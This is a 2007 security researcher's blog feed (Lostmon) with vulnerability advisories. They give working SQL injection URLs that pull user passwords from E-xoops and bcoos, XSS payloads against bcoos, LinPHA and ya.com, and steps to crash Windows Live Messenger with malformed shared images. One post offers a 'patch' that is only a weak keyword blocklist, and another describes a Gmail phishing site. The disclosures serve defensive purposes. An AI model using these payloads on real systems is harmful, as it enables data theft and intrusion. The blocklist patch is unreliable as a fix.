La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-6836256203663886572007-12-09T07:00:00.001-08:002007-12-09T08:45:15.088-08:00E-xoops multiple variable/scripts SQL injection############################################<br />E-xoops multiple variable/scripts SQL injection<br />vendor url: http://www.e-xoops.com<br />Advisore: http://lostmon.blogspot.com/2007/12/<br />e-xoops-multiple-variablescripts-sql.html<br />vendor notify:NO exploits available: YES<br />############################################<br /><br /><br /><br />E-xoops is content-community management system written in PHP-MySQL.<br /><br />E-xoops contains a flaw that may allow an attacker to carry out<br />an SQL injection attack. The issue is due to the script not <br />properly sanitizing user-supplied input to the 'lid','bid' and<br />'gid' variable, multiple script.This may allow an attacker to<br />inject or manipulate SQL queries in the backend database.<br /><br /><br /><br />#################<br />Versions:<br />#################<br /><br />E-Xoops 1.08<br />E-Xoops 1.05 Rev3<br />E-Xoops 1.05 Rev2 <br />E-Xoops 1.05 Rev1<br /><br />and posible early versions.<br /><br />#################<br />Solution:<br />#################<br /><br />no solution available at this time<br />Try to edit the source code.<br />you can look this post in my group<br />to patch E-xoops ,because the source<br />code is veeeery similar to bcoos cms<br /><br />http://groups.google.com/group/lostmon/<br />browse_thread/thread/59f3b836fad5b009<br /><br />and here you have a src reference for<br />E-xoops 1.0.8 http://phpxref.com/xref/exoops/nav.html<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered:25-11-2007<br />vendor notify:--------<br />vendor response:-------<br />disclosure:09-12-2007<br /><br /><br />#################<br />SQL intections:<br />#################<br /><br /><br />http://localhost/e-xoops/modules/mylinks/<br />ratelink.php?lid=-1%20UNION%20SELECT%20pass<br />%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/adresses/<br />ratefile.php?lid=-1%20UNION%20SELECT%20pass<br />%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/mydownloads/<br />ratefile.php?lid=-1%20UNION%20SELECT%20pass<br />%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/mysections/<br />ratefile.php?lid=-1%20UNION%20SELECT%20pass<br />%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/myalbum/<br />ratephoto.php?lid=-1%20UNION%20SELECT%20pass<br />%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/banners/<br />click.php?op=click&bid=-1%20UNION%20SELECT<br />%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/arcade/<br />index.php?act=show_stats&gid=-1%20UNION%<br />20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/arcade/index.php?<br />act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM<br />%20e_xoops_users%20LIMIT%201<br /><br /><br />#################### €nd ########################<br /><br /><br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-22459997786439420172007-12-02T10:59:00.000-08:002007-12-06T03:49:42.768-08:00Posible patch for SQL Injections In bcoos 1.0.10############################################<br />Posible patch for SQL Injections In bcoos 1.0.10<br />vendor url:http://www.bccos.net<br />Patch by Lostmon. (lostmon@gmail.com)<br />Original article:http://lostmon.blogspot.com<br />/2007/12/posible-patch-for-sql-injections-in.html<br />############################################<br /><br />in the last week some researchers and me have found multiple<br />critical SQL injections in bcoos 1.0.10 and prior versions.<br /><br />After a simple study/look of the source code of product<br />i have found a simple patch , this is not a oficial patch but it<br />still working fine ,before the vendor release a oficial patch or<br />a new release. <br /><br />You can use this modification as a solution to mitigate all<br />SQL injections , only need to detect 'union' sql command.<br /><br /><br />##########################<br />Sample code<br />##########################<br />you need to add this code to all afected files ...<br /><br /><br />if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /><br />###########################<br />patch mylinks/ratelink.php<br />############################<br /><br />open ratelink.php and arround line 73 you have a 'else' like } else {<br /><br />put the code just before the else condition like :<br /><br />}<br />if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br />else {<br /><br />save and close the file and now it´s pached <br />try to exploit for verify :<br /><br />http://localhost/bcoops/modules/mylinks/ratelink.php?lid=<br />-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />###############################<br />patch adresses/ratefile.php<br />##############################<br /><br />open ratefile.php and arround line 70 you have a else like } else {<br /><br />put the code just before the else condition like :<br /><br />}<br />if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br />else {<br /><br />save and close the file and now it´s pached <br />try to exploit for verify :<br /><br />http://localhost/bcoops/modules/adresses/ratefile.php?<br />lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />###############################<br />patch mysections/ratefile.php<br />##############################<br /><br />open ratefile.php and arround line 77 you have a else like } else {<br /><br />put the code just before the else condition like :<br /><br />}<br />if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br />else {<br /><br />save and close the file and now it´s pached <br />try to exploit for verify :<br /><br />http://localhost/bcoops/modules/mysections/ratefile.php?<br />lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />############################<br />patch banners/click.php<br />############################<br /><br />open click.php and arround line 5 you have $bid = $_GET['bid'];<br /><br />put the code just after the this line :<br /><br />if (eregi("%20union%20", $bid) ||eregi(" union ", $bid) || eregi("\*union\*", $bid) || eregi("\+union\+", $bid) || eregi("\*", $bid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /><br />save and close the file and now it´s pached <br />try to exploit for verify :<br /><br />http://localhost/bcoops/modules/banners/click.php?<br />bid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />########################### <br />patch arcade/index.php <br />############################ <br /><br /><br />open index.php and arround line 15 you have a switch($act) <br /><br /><br />put the code just before the switch <br /><br /><br />if (eregi("%20union%20", $gid) ||eregi(" union ", $gid) || <br />eregi("\*union\*", $gid) || eregi("\+union\+", $gid) || eregi("\*", <br />$gid)) <br />{ <br />echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /><br />you can patch all of the rate files with the same code, because <br />for rating the code and funcions are similars in diferent modules.<br /><br />###################-€nd-#######################<br /><br />thnx to estrella to be my ligth.<br />thnx to all Lostmon Group Team !!<br />Thnx To All OSVDB manglers !!! Waiting for OSVDB 2.0 !!!<br />Thnx To orinico i know how can i do :D<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-40986379932548166552007-11-30T10:14:00.000-08:002007-12-03T12:10:21.637-08:00Bcoops adresses/ratefile.php lid variable SQL injection########################################################<br />Bcoops adresses/ratefile.php lid variable SQL injection<br />vendor url: http://www.bcoops.net<br />Advisore: http://lostmon.blogspot.com/2007/11/<br />bcoops-adressesratefilephp-lid-variable.html<br />vendor notify:NO exploits available: YES<br />########################################################<br /><br /><br /><br />bcoos is content-community management system written in PHP-MySQL.<br /><br />bcoops contains a flaw that may allow an attacker to carry out<br />an SQL injection attack. The issue is due to the script not <br />properly sanitizing user-supplied input to the 'lid' variable,<br />and adresses/ratefile.php script.This may allow an attacker to<br />inject or manipulate SQL queries in the backend database.<br /><br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoops 1.0.10 =< vulnerable<br /><br />#################<br />Solution:<br />#################<br /><br />No solution at this time !!!<br />Try to edit the source code <br />or Try another product<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered:25-11-2007<br />vendor notify:--------<br />vendor response:-------<br />disclosure:30-11-2007<br /><br /><br />#################<br />SQL intections:<br />#################<br /><br /><br />http://localhost/bcoops/modules/adresses/ratefile.php?<br />lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br /><br /><br />####################### €nd ##############################<br /><br /><br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-34253941201029078812007-11-28T12:21:00.000-08:002007-12-01T03:05:11.540-08:00Bcoops SQL injection and Cross-site scripting####################################################<br />Bcoops SQL injection and Cross-site scripting<br />vendor url: http://www.bcoops.net<br />Advisore: http://lostmon.blogspot.com/2007/11/<br />bcoops-sql-injection-and-cross-site.html<br />vendor notify:YES exploits available: YES<br />####################################################<br /><br /><br /><br />bcoos is content-community management system written in PHP-MySQL.<br /><br />bcoops contains a flaw that may allow an attacker to carry out<br />an SQL injection attack. The issue is due to the arcade/index.php<br />script not properly sanitizing user-supplied input to the 'gid' <br />variable,and myalbum/ratephoto.php script and 'lid' variable are<br />afected by the same flaw This may allow an attacker to inject or<br />manipulate SQL queries in the backend database.<br /><br /><br /><br />bccops contains too a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate the<br />'day' and 'year' variable upon submission to modules/theecal/display.php<br />script. This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the trust <br />relationship between the browser and the server, leading to<br />a loss of integrity<br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoops 1.0.10 =< vulnerable<br /><br />#################<br />Solution:<br />#################<br /><br />No solution at this time !!!<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered:25-11-2007<br />vendor notify:27-11-2007<br />vendor response:-------<br />disclosure:28-11-2007<br /><br /><br />#################<br />SQL intections:<br />#################<br /><br />http://localhost/modules/arcade/index.php?act=show_stats<br />&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />http://localhost/modules/myalbum/ratephoto.php?<br />lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />http://localhost/modules/mylinks/ratelink.php?<br />lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br /><br />#####################<br />Cross-site Scripting<br />#####################<br /><br /><br />http://localhost/modules/ecal/display.php?<br />day=17&month=11&year=2007"><script>alert()</script><br /><br /><br />http://localhost/modules/ecal/display.php?<br />day=1"><script>alert()</script>&month=11&year=2007<br /><br /><br /><br />####################### €nd ############################<br /><br /><br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-10406134663107509442007-10-04T12:35:00.000-07:002007-12-01T03:04:34.535-08:00Robo de contraseñas mediante un Scam de Google Gmail#####################################################<br />Robo de contraseñas mediante un Scam de Google Gmail<br />Robo de contraseñas mediante phishing en E-bullion<br />Descubridores e investigadores: Lostmon(1) Imydes(2)<br />Articulo original: <a href="http://www.imydes.com/?p=117" target="_BLANK">http://www.imydes.com/?p=117</a><br />Fecha: 03/10/2007<br />####################################################<br /><br />Este articulo procede de un trabajo conjunto con <br /><a href="http://www.imydes.com/" target="_BLANK">Imydes</a> la direccion del Articulo original: <a href="http://www.imydes.com/?p=117">http://www.imydes.com/?p=117</a><br /><br />--<br />Como seguramente todos sabreis, Google tiene bastantes<br /> servicios a sus espaldas, por citar algunos:<br />Google Adsense, Google Docs, Gmail, Blogger, Picassa…<br /><br />Mediante este Scam de Gmail Accounts cuyo objetivo es <br />robar la contraseña del internauta despistado podría <br />dar acceso a todos estos servicios de oogle mencionados.<br /><br />El Scam en cuestión consiste en simular un formulario<br />de Google cuyo título es “My Account” simulando ser un<br />gestor para editar información personal de la cuenta de<br />Google.<br /><br />En el formulario en cuestión encontramos los siguientes campos:<br /><br />Username<br />Password<br />First name<br />Last name<br />Nick name<br />Zip code<br />Country<br /><br />(Una pequeña nota, el usuario intermedio si pica por primera <br />vez podrá ver un pequeño fallo y es que el campo Password no<br />está protegido por **** y sale la contraseña a simple vista <br />y en el campo Country sale un desplegable con varios paises<br />y al no estar codificado con UTF-8 salen con “carácteres extraños”)<br /><a href="http://www.imydes.com/wp-content/uploads/2007/10/us-gmailcom-imydes.JPG" target="_blank"><IMG src="http://www.imydes.com/wp-content/uploads/2007/10/us-gmailcom-imydes.JPG" height="250" width="400"></a><br />Gmail Accounts Scam Imydes<br /><br />Si llenamos los campos antes nombrados y le damos a “Save”,<br />veremos que nos direcciona hacia “update.php” donde seguramente<br />se almacene la información introducida en el formulario desconozco<br />si es en BBDD o en un fichero).<br /><br />Por otra parte, si entramos en la web directamente sin poner<br />www veremos que los creadores del Scam se han olvidado de <br />poner una página inicial para que no puedas ver el contenido<br />del servidor raiz.<br /><br />En este descuido podemos ver un sistema para enviar e-mails <br />masivos del Scam (concretamente la dirección web es esta: http://us-gmail.com/mail.php).<br /><br />También podemos ver una página web que seguramente sigue la<br />misma dinámica que el Scam de Gmail pero es con e-Bullion <br />(web http://us-gmail.com/e-lbullion/). Podemos ver que en <br />el caso de e-bullion se dirige a “/secure/update.php”.<br /><a href="http://www.imydes.com/wp-content/uploads/2007/10/e-bullion-imydes.JPG" target="_blank"><IMG src="http://www.imydes.com/wp-content/uploads/2007/10/e-bullion-imydes.JPG" height="250" width="400"></a><br />E-bullion Phishing <br /><br />Créditos:<br /><br />Imydes (Documentación del Scam e investigación)(<a href="http://www.imydes.com">www.imydes.com</a>)<br />Lostmon (El descubridor de este Scam e investigación) (<a href="http://lostmon.blogspot.com">http://lostmon.blogspot.com</a>)<br />Lostmon Group (<a href="http://groups.google.com/group/lostmon" target="_BLANK">http://groups.google.com/group/lostmon</a>)<br /><br />Gracias a XiuX, MARNI, itimad, Yeremat, Soed, Newcastle por confiar en mi.<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-57535572165838118092007-09-21T23:49:00.000-07:002007-12-01T03:05:45.711-08:00Windows live Messenger malformed file overflow DoS remote exploitation.############################################################## <br />Windows live Messenger malformed file overflow remote exploitation.<br /> (windows ole32.dll ms07-024) (windows GDI MS07-046 )<br />vendor url: http://www.microsoft.com/ , http://get.live.com/messenger/overview <br />Advisore: http://lostmon.blogspot.com/2007/09/<br />windows-live-messenger-jpg-overflow.html<br />Vendor notify:YES Vendor Confirmed:yes(DoS issue) Explotation include:YES <br />BID:<a href="http://www.securityfocus.com/bid/25795" target="_BLANK">25795</a><br />############################################################# <br /><br />A buffer overflow exists in Windows MSN Live. The GDI engine fails <br />to representate malformed data in image files resulting in a buffer<br />overflow. With a specially crafted jpg or wmf or gif file or doc <br />file or ico, an attacker can cause arbitrary code execution<br />(not Shure RCE) or a DoS resulting in a loss of integrity. <br /><br />############ <br />History <br />############ <br /><br />after install this patch for a vulnerability in windows GDI <br />MS07-046 i make several probes with some malformed image files <br />(jpj,gif,wmf,ico,doc) and i have the same result before i install<br />this patch and after install it :( <br /><br />############### <br />versions tested <br />############### <br /><br />All of this versions and Windows MSN live 8.1 <br />I don´t know if other versions of windows are prone <br />vulnerables too , but i think that is vulnerable <br />all systems related in MS07-046 Microsoft Bulleting. <br /><br />win xp media Center version 2002 service pack 2 <br />Win XP pro <br />Win XP home <br /><br />############### <br />Solution <br />############### <br />No solution was available at this time, but <br /><br />DON´T SHARE ANY FOLDER IN MSN UTIL <br />HAVE A SOLUTION OR PATCH !!!!!! <br /><br />The vendor planing address this issue <br />in the next service pack.<br /><br />############### <br />Timeline <br />############### <br /><br />Discovered:20-08-2007 <br />Vendor initial contact:23-08-2007 <br />Vendor response:24-08-2007 <br />Vendor patch:--- <br />Private disclosure:17-09-2007 <br />Public disclosure: <br /><br />############## <br />Impact <br />############## <br /><br />A remote user can cause a DoS in the aplication. <br />If the patch for windows meta files (wmf) does not <br />work correctly , a remote user can execute arbitrari code <br />but i´m not shure if the RCE can be done. <br /><br /><br />########################## <br />Explanation Step By Step <br />########################## <br /><br />What we need?? <br /><br />- Two machines with windows msn live 8.1 and with <br />- Two of the systems related in versions section. <br />- A malformed image like jpg,gif, or wmf. <br /><br />Machine 1 => msn 8.1 & windows xp media center 2002 all fully patched.[victim´s] <br />Machine 2 => msn 81. & windows xp home all fully patched.[evil_attack] <br /><br />In windows msn 8.1 we have a option to share folders with others contacts. <br />The first time wen you share a folder with a contact msn ask for sharing, <br />if you accept the folder is automatic sharing all times. <br /><br />To look the folder location you can go to my computer/msn <br />folders/[VICTIM´S]@hotmail.com <br /><br />and the fisical path is: <br /><br />C:\Documents and Settings\[YOUR_USER]\Configuración local\ <br />Datos de programa\Microsoft\Messenger\[ATTACKER]@hotmail.com\ <br />Sharing Folders\[VICTIM´S]@hotmail.com <br /><br />1 - login in msn in the two machines. <br />2 - machine 2 open a conversation window with machine 1 <br />3 - Machine 2 click in the incon to share a folder. <br />4 - Mahine 1 accept to share. <br />5 - put in machine 1 in the share folder a new folder and inside it a <br />malformed jpg file; but not by msn go to fisicall path and put there , <br />because if you drag&drop the image to share folder inside msn,The aplication crash. <br /><br />6 - close in all machines the share folder. <br /><br />now you have in the machine 1 in the fisical path for the share folder <br />a folder with a malformed image. <br /><br />7 - in machine 2 click in the icon to share and wen msn in machine 1 <br />look for open and send the list of files inside the MSN in the <br />machine 1 Crash , and if you don´t terminate the proccess <br />crashing windows too with a Blue screen of death :S <br /><br />Now you can crash the MSN in the victim´s machine all times wen click <br />in the icon to share. <br />The victim need to delete this folder for stop this situation. <br /><br />OK think moore we need to put a image in the machine victim´s. <br /><br />Can we put it with no interaction of the victims?...yes <br />the victim oly need to make one click. :) <br /><br />if we have a share folder with the victim, and victim and attacker are online... <br />the victim can put in his local share folder a new folder with the <br />malformed image, <br />and in the attacker conversation window apears a new Message what say... <br /><br />The victim has add files to share folder would do you like to <br />sincronice or update ?? ...or some similar... <br /><br />if the attacker click on yes... the MSN on the attacker machine is Crasing. <br />and now the victim can crash Victim´s MSN all times . <br />The attacker need to delete de folder with the evil jpg. <br /><br />i have a eassier way to exploit and/or manipulate the malformed file: <br /><br />1 share a folder with a contact in msn. <br />2 close in msn the share folder. <br />3 open a cmd and go to the fisical path of the share folder. <br />4 generate the malformed file by perl python or similar. <br /><br />if the file is generated and you have open a conversation window with <br />the victim, your msn say "all files are upload" wen your msn finish the <br />sincronization with the msn victim`s, and in the victim´s MSN say " the <br />user bla bla bla has update the sare folder" or some similar. <br /><br />Now the exploit is in your machine and in the machine´s victim. <br /><br />if you clik on share folder icon, and if you have the exploit in your <br />machine wen you clik <br />your MSN crashing , but if you after sincronization, you delete in <br />your local folder the malformed file... wen you clik in share folder. <br />wen MSN try to sincronize the share folder in victim´s machine with <br />your share folder. the MSN on the machine´s victim is crashing. <br /><br />i think that some of this issues in malformed files...<br />comming from the extended file attributes. <br /><br />if any like to profundice on it, here you have two related interesting articles: <br /><br />First part: <br /><br />http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html <br /><br />Second part : <br /><br />http://lostmon.blogspot.com/2007/08/windows-extended-file-attributes-buffer.html <br /><br />and the related Microsoft bulletins:<br /><br />Vulnerability in ole32.dll :<br /><br />http://www.microsoft.com/technet/security/bulletin/ms07-024.mspx<br /><br />Vulnerability in gdi32.dll :<br /><br />http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx<br /><br /><br /><br />########################## €nd ##################### <br /><br />Thnx to extrella to be my ligth.<br />Thnx to Dave from securiy center for his patience. <br />Thnx to FalconDeOro ( la paciencia, es una virtud, pequeño Jedy) <br />Thnx to All Lostmon Group Team. <br />Thnx to N0xTrUm from N0xTrUm Tecnologies http://n0xtrum.blogspot.com/ <br />Thnx To ANELKAOS from http://www.elhacker.net/ for his support. <br /><br />-- <br />atentamente: <br />Lostmon (lostmon@gmail.com) <br />Web-Blog: http://lostmon.blogspot.com/ <br />Google group: http://groups.google.com/group/lostmon (new) <br />-- <br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-21653646405707274522007-09-07T11:33:00.000-07:002007-10-25T12:28:18.155-07:00LINPHA 1.3.1 Multiple Scripts XSS##########################################<br />LINPHA 1.3.1 Multiple Scripts XSS<br />vendor url:http://linpha.sourceforge.net<br />Advisore:http://lostmon.blogspot.com/2007/09/<br />linpha-131-multiple-scripts-xss.html<br />vendor informed:NO exploit available:YES<br />##########################################<br /><br /><br />LinPHA is an easy to use, multilingual, flexible photo/image<br />archive/album/gallery written in PHP. It uses a SQL database <br />(MySQL/PostgreSQL/SQLite) to store information about your pictures<br /><br /><br />LinPHA contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate multiple params upon submission to multiple scripts<br />.This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />################<br />Versions<br />################<br /><br />LinPHA 1.3.1<br /><br />################<br />Timeline<br />################<br /><br />Discovered:05-08-2007<br />disclosure:07-09-2007<br /><br />###################<br />Examples<br />###################<br />http://localhost/linpha/actions/image_resized_view.php?<br />imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600<br /><br />http://localhost/linpha/search.php?1=1&pn=2<br />"><script>alert()</script>#tn<br /><br />http://localhost/linpha/viewer.php?album=etc/passwd"><br /><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha/search.php?1=1&order="><br /><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha//search.php?1=1&imgid=14013"><br /><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha/search.php?1=1&imgid=14013"><br /><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha/search.php?search_text=a&order="><br /><body><script>alert()</script><h1>lalala</h1></body><br /><br />Some other params and scripts are afected...<br /><br />###################### €nd ###############################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all Lostmon´s Group Team<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14451728487760705342007-08-30T10:42:00.000-07:002007-10-25T12:28:18.156-07:00Ya.com sufre agujeros de tipo XSS###################################<br />Ya.com sufre agujeros de tipo XSS<br />###################################<br /><br />La web de Ya.com esta afectada por vulnerabilidades<br />de tipo cross-site scripting.<br /><br />Los agjeros se hayan localizados bajo el subdonimio<br />acceso.ya.com y asi mismo sobre corp.ya.com<br /><br />Aparte de los aqui mencionados a modo de prueba de<br />concepto existen algunos mas en algunas otras zonas<br />dinamicas del portal.<br /><br />Tras haber intentado en varias ocasiones contactar<br />con ya.com , en principio ha sido imposible ya que <br />en su web la una forma de contacto con ellos es<br />telefonica, y yo no estoy dispuesto a gastarme <br />mi dinero para reportar fallos en su web;asi pues<br />me he visto obligado a mandar correos al tum tum <br />a seguridad, security etc etc @ya.com para ver si <br />por suerte alguno existia o no ,lo cual veo que no<br />al no obtener respuesta , o bien simplemente pasan...<br /><br />Algunos ejemplos de esta explotacion:<br /><br />https://acceso.ya.com/ayuda/searchfunc.html?si=html<br />&co=20&sw=[XSS-CODE]&Submit=Buscar<br /><br /><br />http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2<br />&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas<br /><br />http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2<br />&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]<br /><br />##################### €nd ###########################<br /><br />Thnx to estrella to be my ligth.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-38937153728026786832007-08-09T15:18:00.000-07:002007-08-10T03:05:20.986-07:00Windows Extended file attributes buffer overflow Study II##########################################################<br />Windows Extended file attributes buffer overflow Study II<br />Original:<br />##########################################################<br /><br />In a previous article , i write about extended file<br />attributes:<br /><br /> "A local buffer overflow exists in the windows explorer . <br /> The extended file atributes functions have a small size <br /> of the buffer in 'FileAllInformation(),FileNameInformation'<br /> and other subfunctions in Undocumented functions of NTDLL ,<br /> resulting in a buffer overflow. With a unknow impact."<br /><br /> Original article:<br /><br /> http://lostmon.blogspot.com/2007/06/<br /> buffer-overflow-in-extended-file.html<br /> <br />I Write "this issue could be done in all files"...<br /><br />Now i go to extend some details moore of my investigation <br />and the research of this issue.<br /><br />Look the new vulnerabilities on Microsoft windows GDI and ole32<br /> <br />http://www.securityfocus.com/bid/16167<br />http://www.securityfocus.com/bid/25207<br />http://secunia.com/advisories/10020/<br />http://secunia.com/advisories/10194/<br />http://osvdb.org/displayvuln.php?osvdb_id=31885<br />http://osvdb.org/displayvuln.php?osvdb_id=31886<br />http://osvdb.org/displayvuln.php?osvdb_id=31887<br /><br />All PoC and all exploits have some details to study.<br /><br />All files wen explorer crash ,crashing wen try to look <br />the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)<br />How to demostrate it ??<br /><br />All exploits have some similitudes ....<br />all crafted files crashing at the same point or at the same properties<br />this is a litle test/study of those exploits / vulnerabilities<br /><br /><br />############################################<br />Testing with filemon and EFA.vbs<br />############################################<br /><br /><br />####################<br />Exploit wmf File<br />####################<br /><br />Download BID 16167 exploit and unzip it in c:\test<br /><br />open filemon and include process explorer.exe<br />and click in apply.<br />now open c:\test\ and wen explorer looks the EFA for the wmf<br />file , crash , or wen put the mouse over...<br /><br />in the filemon wen the crash is done we have some similar to <br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_WMF.GIF" target="_BLANK"><img 